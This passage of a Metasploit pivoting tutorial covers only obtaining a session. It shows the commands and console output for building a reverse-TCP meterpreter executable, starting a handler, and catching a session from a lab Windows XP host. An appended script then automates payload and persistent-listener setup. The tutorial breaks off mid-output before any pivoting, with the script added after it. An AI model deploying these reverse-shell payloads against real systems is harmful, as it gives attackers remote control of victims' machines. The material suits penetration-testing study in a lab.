This article walks through some practical tips for using Metasploit's tunnelling and proxying (pivoting) features.
0×00 Obtaining a meterpreter session
1. First, generate the executable payload (msfpayload was deprecated in favour of msfvenom, as the warning in the output below shows):
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 281
Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2. Start msfconsole and listen on the reverse-connection port
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ -- --=[ 1386 exploits - 863 auxiliary - 236 post ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
3. Run meter.exe on xp-test1; the attacker receives a meterpreter session
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.101.107
[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
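The three steps above can be reproduced with current tooling. The following script is an added example, not code from the original post: it prints the msfvenom command that replaces the deprecated msfpayload call from step 1, and writes an msfconsole resource file that sets up the step 2 handler so it can be replayed with one command and keeps listening after the first session arrives. The IP, port and file names are the post's lab values and are assumptions here; the script does not invoke msfvenom or msfconsole itself.

```shell
#!/bin/sh
# Added example (not from the original post): build the msfvenom command
# equivalent to the post's msfpayload call, and write a resource file that
# automates the multi/handler setup from step 2.
# ATTACKER_IP, LPORT and the file names are assumptions from the post's lab.

ATTACKER_IP=192.168.101.105   # payload LHOST: must be reachable from the target
LPORT=444
PAYLOAD=windows/meterpreter/reverse_tcp

# Print the msfvenom command. msfpayload's "X" output (raw PE) corresponds
# to "-f exe" in msfvenom; "-o" writes the file instead of using a redirect.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o meter.exe\n' \
        "$PAYLOAD" "$ATTACKER_IP" "$LPORT"
}

# Write a resource file for multi/handler to the path given as $1 and echo
# that path. The handler binds 0.0.0.0 (all interfaces), which is why its
# LHOST differs from the payload's LHOST. ExitOnSession=false keeps the
# listener up for further callbacks, and "exploit -j -z" runs it as a
# background job without dropping into the first session automatically.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST 0.0.0.0
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
    echo "$rc"
}

# Running the script prints the msfvenom command and writes handler.rc.
venom_cmd
write_handler_rc handler.rc >/dev/null
```

Start the listener with `msfconsole -q -r handler.rc`; sessions then show up under `sessions -l` and are entered with `sessions -i <id>`. Note the two different LHOST values: the one baked into the payload is the address the target connects back to, while the handler's 0.0.0.0 only controls which local interfaces the listener binds.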